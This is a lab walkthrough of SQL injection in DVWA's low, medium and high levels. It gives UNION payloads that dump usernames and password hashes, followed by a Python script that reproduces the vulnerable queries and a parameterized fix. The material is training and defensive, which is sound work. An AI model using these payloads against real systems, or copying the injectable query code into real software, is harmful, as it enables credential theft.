low
Looking at the source, the injection point id is a string type (interpolated inside single quotes) with no validation at all, so the payload can go straight in:
' union select first_name,password from users#
The results come back as follows; note that the Surname field now holds the password column pulled in by the UNION, because the page prints the result columns by position:
ID: ' union select first_name,password from users#
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: ' union select first_name,password from users#
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select first_name,password from users#
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select first_name,password from users#
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select first_name,password from users#
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
medium
Looking at the source, the code now runs id through mysqli_real_escape_string to escape special characters, but at this level the injection point id is numeric (interpolated unquoted into the comparison), so no ' is needed and the escaping has nothing to act on. The id comes from a drop-down list submitted by POST, so modify the option value in the HTML source (or edit the request in an intercepting proxy) and submit:
<option value="0 union select first_name,password from users">1</option>
The results come back as follows:
ID: 0 union select first_name,password from users
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: 0 union select first_name,password from users
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: 0 union select first_name,password from users
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 0 union select first_name,password from users
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 0 union select first_name,password from users
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
high
Looking at the source, the injection point id is a string type again and the query appends LIMIT 1 to the result. The method is essentially the same as low: the # comments out the trailing quote together with LIMIT 1, so the UNION still returns every row:
' union select first_name,password from users#
The results come back as follows:
ID: ' union select first_name,password from users#
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: ' union select first_name,password from users#
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select first_name,password from users#
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select first_name,password from users#
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select first_name,password from users#
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
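To make the three query shapes above concrete, here is an added example (not part of the original walkthrough or of DVWA's code) that rebuilds each level's query construction in Python against an in-memory SQLite table, runs the low, medium and high payloads, and contrasts them with a parameterized, type-checked lookup. The table rows are constructed sample data: the hashes are the ones printed above, the surnames are illustrative. One dialect difference is assumed and labelled in the code: SQLite has no # comment, so the payloads end with -- instead; on DVWA's MySQL back end # plays the same role.

```python
import sqlite3

# Constructed sample data shaped like DVWA's users table
# (user_id, first_name, last_name, password). Hashes taken from the
# walkthrough output above; surnames are illustrative.
SAMPLE_USERS = [
    (1, "admin", "admin", "e2075474294983e013ee4dd2201c7a73"),
    (2, "Gordon", "Brown", "e99a18c428cb38d5f260853678922e03"),
    (3, "Hack", "Me", "8d3533d75ae2c3966d7e0d4fcc69216b"),
    (4, "Pablo", "Picasso", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    (5, "Bob", "Smith", "5f4dcc3b5aa765d61d8327deb882cf99"),
]

# Assumption: SQLite only knows '-- ' line comments, so the string-context
# payload ends with '-- ' where the walkthrough uses MySQL's '#'.
LOW_PAYLOAD = "' union select first_name,password from users-- "
MEDIUM_PAYLOAD = "0 union select first_name,password from users"


def connect():
    """Return an in-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def escape_like_mysqli(value):
    """Backslash-escape the characters mysqli_real_escape_string acts on."""
    table = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def low_lookup(conn, user_id):
    """Low: id interpolated inside single quotes, no validation."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def medium_lookup(conn, user_id):
    """Medium: id is escaped, then interpolated unquoted into a numeric compare.

    The numeric payload contains none of the escaped characters, so the
    escaper returns it unchanged and the UNION survives intact.
    """
    escaped = escape_like_mysqli(user_id)
    query = f"SELECT first_name, last_name FROM users WHERE user_id = {escaped}"
    return conn.execute(query).fetchall()


def high_lookup(conn, user_id):
    """High: same as low, but LIMIT 1 is appended to the query.

    The comment in the payload swallows the closing quote and the LIMIT
    clause, so the limit never applies to the injected UNION.
    """
    query = (f"SELECT first_name, last_name FROM users "
             f"WHERE user_id = '{user_id}' LIMIT 1")
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_id):
    """Hardened: validate the type and bind the value instead of interpolating."""
    uid = int(user_id)  # raises ValueError for anything that is not an integer
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (uid,)).fetchall()


def safe_rejects(conn, user_id):
    """True if the hardened lookup refuses the value before touching the DB."""
    try:
        safe_lookup(conn, user_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = connect()
    print("low    :", low_lookup(db, LOW_PAYLOAD))
    print("medium :", medium_lookup(db, MEDIUM_PAYLOAD))
    print("high   :", high_lookup(db, LOW_PAYLOAD))
    print("safe   :", safe_lookup(db, "1"), "rejects payload:",
          safe_rejects(db, MEDIUM_PAYLOAD))
```

Running it shows all three vulnerable shapes returning five (first_name, password) pairs, while the hardened lookup returns one row for a legitimate id and rejects either payload outright. The point of escape_like_mysqli is that escaping only protects a value that sits inside quotes; once the value is dropped into a numeric position, or the attacker can comment out the quote that follows it, the only reliable fix is binding the value as a parameter and enforcing its type.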